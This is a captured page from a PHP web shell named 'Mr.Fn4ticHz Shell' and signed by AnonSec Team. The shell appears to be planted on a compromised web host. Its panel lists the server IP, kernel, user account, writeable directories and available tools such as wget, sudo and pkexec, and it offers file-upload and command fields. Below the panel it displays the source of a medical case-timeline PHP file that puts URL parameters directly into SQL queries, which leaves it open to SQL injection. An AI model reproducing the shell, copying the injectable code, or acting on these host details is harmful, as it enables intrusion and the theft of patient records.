Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.143.235.23
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//casetimiline.php
<?php
session_start();
require_once("../LoginManager.php");
require_once("../DBManager.php");
include("dbconnection.php");
include("header.php");
include("dashboarddocument.php");
?>
 <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
                     	

        
  <script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>

    <script src="../dist/js/price.js"></script>
    <br>
    <br>
    <table class="table table-hover table-bordered">
        <thead>
            <th>Date Time</th>
            
            <th>Assisted By</th><th>Action</th>
        </thead>
        <tbody>
           <?php 
include("dbconnection.php");
		 $narayan=LoginManager::currentUser();
        $hari=LoginManager::getUserTypeByuname("$narayan");
        	$sql ="SELECT * FROM drnote WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' ORDER BY `id` DESC";
		$qsql = mysqli_query($con,$sql);
		while($re = mysqli_fetch_array($qsql))
		{
                 
		  
     echo" <tr><td>
	<a style='color:blue'  target='_blank' href='casesummery.php?prescriptionid=$re[prescriptionid]&patientid=$re[patientid]&created_at=$re[updated_at]'><u><h4>$re[updated_at]</h4></u></a>
	
	
	</td>
                
                ";	    
                $sql1 ="SELECT * FROM site_users WHERE userno='$re[entered_by]'";
		$qsql1 = mysqli_query($con,$sql1);
		if($rs1 = mysqli_fetch_array($qsql1))
	echo"	<td><b></b>$rs1[name] </b> </td>";
		
	
		echo "<td><a href=''>View</a></td> </tr>";
		}	?>
           
        </tbody>
    </table>
       
	<br>
    <br>
    


Anon7 - 2022
AnonSec Team